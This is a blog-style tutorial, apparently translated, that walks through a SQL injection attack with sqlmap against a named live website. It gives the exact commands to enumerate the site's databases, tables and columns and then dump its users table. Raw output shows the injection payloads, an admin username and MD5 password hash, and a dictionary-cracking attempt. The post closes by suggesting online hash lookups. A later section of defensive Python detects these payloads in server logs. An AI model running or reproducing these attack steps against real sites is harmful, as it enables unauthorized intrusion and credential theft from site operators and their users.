Friday, 10 August 2012

SQL Injection Tutorial with SQLMAP

The following is a tutorial on using SQLMAP to obtain user accounts from a website's DATABASE.
NB: SQLMAP is a hacking tool that runs on the LINUX OS.
NB: I assume you have already installed the SQLMAP tool on your LINUX OS.

COMMAND DESCRIPTIONS:
--dbs          : to find out how many DATABASES the website has
--tables       : to find out which tables the website has
--columns      : to find out how many columns the table we chose has
--level 5      : to raise our scan level to level 5 on the website we scan
--random-agent : to (sorry, I don't know yet)
-D, -T, -C     : Database, Table, Column

Target = http://www.barracuda.gr

1. Open your TERMINAL and change to the directory where you saved SQLMAP.
NB: I re-downloaded SQLMAP and saved the SQLMAP FOLDER on the Desktop of my BACKTRACK LINUX.

Once inside the directory/folder where the SQLMAP tool is stored, type this command in your TERMINAL:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

For me, the full result of that syntax looks like this:
root@bt:~/Desktop/HACK/sqlmap# ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

The result:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:43:09

[22:43:09] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[22:43:12] [INFO] testing connection to the target url
[22:43:15] [INFO] testing if the url is stable, wait a few seconds
[22:43:24] [INFO] url is stable
[22:43:24] [INFO] testing if GET parameter 'id' is dynamic
[22:43:26] [INFO] confirming that GET parameter 'id' is dynamic
[22:43:27] [INFO] GET parameter 'id' is dynamic
[22:43:28] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:43:28] [INFO] testing for SQL injection on GET parameter 'id'

[22:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:43:37] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:43:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:43:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

[22:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[22:45:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:45:48] [INFO] target url appears to have 8 columns in query
[22:45:57] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection points with a total of
21 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[22:46:36] [INFO] testing MySQL
[22:46:40] [INFO] confirming MySQL
[22:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[22:46:43] [INFO] fetching database names
[22:46:44] [INFO] the SQL query used returns 2 entries
[22:46:48] [INFO] retrieved: "information_schema"
[22:46:49] [INFO] retrieved: "barrak_db"
available databases [2]:
[*] barrak_db
[*] information_schema

[22:46:49] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:46:49 

2. We now know the website's DATABASES. There are 2 of them: barrak_db and information_schema.
Now type the following command to find out its tables:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db --tables

The result:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:49:05

[22:49:05] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
[22:49:05] [INFO] resuming back-end DBMS 'mysql'
[22:49:07] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---

[22:49:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[22:49:11] [INFO] fetching tables for database: 'barrak_db'

[22:49:13] [INFO] the SQL query used returns 7 entries
[22:49:14] [INFO] retrieved: "article"
[22:49:16] [INFO] retrieved: "newsletter"
[22:49:17] [INFO] retrieved:"offers"
[22:49:18] [INFO] retrieved: "photos_tbl"
[22:49:20] [INFO] retrieved: "products_tbl"
[22:49:21] [INFO] retrieved: "tbl_category"
[22:49:23] [INFO] retrieved: "users"
Database: barrak_db
[7 tables]
+--------------+
| article      |
| newsletter   |
| offers       |
| photos_tbl   |
| products_tbl |
| tbl_category |
| users        |
+--------------+

[22:51:40] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:51:40 

3. We have now obtained the tables that are inside that DATABASE.
I'm interested in the USERS TABLE; it may contain the USER NAMES, including the ADMIN, that are used to LOG IN on the login webpage.
Next, type the following command to find out which COLUMNS are inside the USERS table:
./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users --columns

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:18:10

[23:18:10] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
[23:18:10] [INFO] resuming back-end DBMS 'mysql'
[23:18:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:18:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:18:15] [INFO] fetching columns for table 'users' in database 'barrak_db'

[23:18:15] [INFO] the SQL query used returns 18 entries
[23:18:15] [INFO] resumed: "userid","int(5)"
[23:18:15] [INFO] resumed: "firstname","varchar(30)"
[23:18:15] [INFO] resumed: "lastname","varchar(30)"
[23:18:15] [INFO] resumed: "username","varchar(20)"
[23:18:15] [INFO] resumed: "password","varchar(100)"
[23:18:15] [INFO] resumed: "useraddress","varchar(50)"
[23:18:15] [INFO] resumed: "postalcode","int(8)"
[23:18:15] [INFO] resumed: "perioxi","varchar(30)"
[23:18:15] [INFO] resumed: "poli","varchar(30)"
[23:18:15] [INFO] resumed: "phone","int(10)"
[23:18:15] [INFO] resumed: "usermail","varchar(30)"
[23:18:15] [INFO] resumed: "confirm_hash","varchar(40)"
[23:18:15] [INFO] resumed: "is_confirmed","int(3)"
[23:18:15] [INFO] resumed: "userip","varchar(15)"
[23:18:15] [INFO] resumed: "date_created","date"
[23:18:15] [INFO] resumed: "islogged","int(3)"
[23:18:15] [INFO] resumed: "last_logging","date"
[23:18:15] [INFO] resumed: "user_level","int(3)"
Database: barrak_db
Table: users
[18 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| confirm_hash | varchar(40)  |
| date_created | date         |
| firstname    | varchar(30)  |
| is_confirmed | int(3)       |
| islogged     | int(3)       |
| last_logging | date         |
| lastname     | varchar(30)  |
| password     | varchar(100) |
| perioxi      | varchar(30)  |
| phone        | int(10)      |
| poli         | varchar(30)  |
| postalcode   | int(8)       |
| user_level   | int(3)       |
| useraddress  | varchar(50)  |
| userid       | int(5)       |
| userip       | varchar(15)  |
| usermail     | varchar(30)  |
| username     | varchar(20)  |
+--------------+--------------+

[23:18:15] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:18:15

4. As expected, there is not only a USERNAME column but also a PASSWORD column.
Let's DUMP it. #devils mode = on
Type the following command:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users -C password,username,usermail,userid,userip,user_level --dump

The result:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool 
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:21:13

[23:21:13] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[23:21:13] [INFO] resuming back-end DBMS 'mysql'
[23:21:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:21:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:21:18] [INFO] fetching entries of column(s) 'password, user_level, userid, userip, usermail, username' for table 'users' in database 'barrak_db'
[23:21:18] [INFO] the SQL query used returns 1 entries
[23:21:19] [INFO] retrieved: "a65d487491bd8078e3fc7c83db598cbe","3","15","","","barrak"
[23:21:19] [INFO] analyzing table dump for possible password hashes recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] Y
[23:21:22] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/Desktop/HACK/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1

[23:21:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] Y

[23:21:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[23:21:26] [INFO] starting 4 processes
[23:21:45] [INFO] using suffix '1'
[23:22:03] [INFO] using suffix '123'
[23:22:22] [INFO] using suffix '2'
[23:22:41] [INFO] using suffix '12'
[23:22:59] [INFO] using suffix '3'
[23:23:17] [INFO] using suffix '13'
[23:23:37] [INFO] using suffix '7'
[23:23:56] [INFO] using suffix '11'
[23:24:14] [INFO] using suffix '5'
[23:24:34] [INFO] using suffix '22'
[23:24:53] [INFO] using suffix '23'
[23:25:13] [INFO] using suffix '01'
[23:25:32] [INFO] using suffix '4'
[23:25:50] [INFO] using suffix '07'
[23:26:11] [INFO] using suffix '21'
[23:26:30] [INFO] using suffix '14'
[23:26:49] [INFO] using suffix '10'
[23:27:10] [INFO] using suffix '06'
[23:27:29] [INFO] using suffix '08'
[23:27:50] [INFO] using suffix '8'
[23:28:09] [INFO] using suffix '15'
[23:28:30] [INFO] using suffix '69'
[23:28:49] [INFO] using suffix '16'
[23:29:07] [INFO] using suffix '6'
[23:29:25] [INFO] using suffix '18'
[23:29:43] [INFO] using suffix '!'
[23:30:02] [INFO] using suffix '.'
[23:30:21] [INFO] using suffix '*'
[23:30:41] [INFO] using suffix '!!'
[23:31:01] [INFO] using suffix '?'
[23:31:20] [INFO] using suffix ';'
[23:31:39] [INFO] using suffix '..'
[23:31:58] [INFO] using suffix '!!!'
[23:32:16] [INFO] using suffix ','
[23:32:36] [INFO] using suffix '@'
[23:32:55] [INFO] writing uncracked hashes to file '/tmp/tmps5Ogjj.txt' for eventual further processing
[23:32:55] [WARNING] no clear password(s) found
[23:32:55] [INFO] postprocessing table dump
Database: barrak_db
Table: users
[1 entry]
+--------+---------+----------+----------+----------------------------------+------------+
| userid | userip  | username | usermail | password                         | user_level |
+--------+---------+----------+----------+----------------------------------+------------+
| 15     | <blank> | barrak   | <blank>  | a65d487491bd8078e3fc7c83db598cbe | 3          |
+--------+---------+----------+----------+----------------------------------+------------+

[23:32:55] [INFO] table 'barrak_db.users' dumped to CSV file '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr/dump/barrak_db/users.csv'
[23:32:55] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:32:55 
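The same four steps seen from the web server's side: this is an added example, not part of the original post or of sqlmap, that parses constructed Apache combined-format log lines, URL-decodes the request target and flags the payload shapes sqlmap reported above (the boolean-based blind `AND 2597=2597`, the `UNION ALL SELECT NULL` padding, the hex `CONCAT(0x...)` marker and the trailing `#`), plus a User-Agent that differs on every request from one client, which is what --random-agent produces. The log lines, client addresses and the 3-request threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed combined-format lines (documentation IPs); payloads are the ones sqlmap
# reported above, URL-encoded as a server logs them, with a different UA per request.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Aug/2012:22:43:12 +0700] "GET /newsone.php?id=50 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
203.0.113.9 - - [10/Aug/2012:22:43:37 +0700] "GET /newsone.php?id=50%20AND%202597%3D2597 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
203.0.113.9 - - [10/Aug/2012:22:45:57 +0700] "GET /newsone.php?id=50%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,%20CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a),%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5211 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
198.51.100.4 - - [10/Aug/2012:22:46:01 +0700] "GET /newsone.php?id=51 HTTP/1.1" 200 4980 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 Chrome/21.0 Safari/537.1"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules run on the URL-decoded request target; each mirrors a payload in the output above.
RULES = [
    ("boolean-blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),        # id=50 AND 2597=2597
    ("union-null-padding", re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I)),
    ("hex-concat-marker", re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I)),  # CONCAT(0x3a6364683a,...)
    ("comment-terminator", re.compile(r"(#|--\s)\s*$")),                      # trailing '#' closes the query
]

def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {**m.groupdict(), "decoded": unquote_plus(m.group("path"))}

def match_rules(decoded_target):
    """Names of the payload rules that fire on a decoded request target."""
    return [name for name, rx in RULES if rx.search(decoded_target)]

def analyze(log_text, ua_threshold=3):
    """Per-client summary: payload hits, and whether the User-Agent changes on every request."""
    per_ip = defaultdict(lambda: {"hits": [], "user_agents": set(), "requests": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format; skip
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        entry["user_agents"].add(rec["ua"])
        entry["hits"].extend((rec["ts"], name) for name in match_rules(rec["decoded"]))
    report = {}
    for ip, e in per_ip.items():
        n_ua = len(e["user_agents"])
        rotating = n_ua >= ua_threshold and n_ua == e["requests"]  # fresh UA on every request
        report[ip] = {"hits": e["hits"], "distinct_user_agents": n_ua,
                      "ua_rotation": rotating, "suspicious": bool(e["hits"]) or rotating}
    return report
```

Run `analyze(SAMPLE_LOG)` to get one summary per client; the first client is flagged on both the payload rules and the rotating User-Agent, the second on neither.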

DAMN....!!!!
The PASSWORD is not a PLAINTEXT PASSWORD.
So we have to DECRYPT that password first.
COUNT the length of the PASSWORD HASH (it is 32 in length), which means it probably uses MD5 ENCRYPTION.
Let's try to decrypt it using an ONLINE MD5 DECRYPTOR.
Or, as an alternative, we use " WWW.GOOGLE.COM ":
type that PASSWORD HASH into GOOGLE
and this is the result


We can also verify it through the PASTEBIN LINK



This time I WAS NOT LUCKY YET + I haven't had the time to DECRYPT that password.
Hopefully there will be time to play around with this PASSWORD.
(:
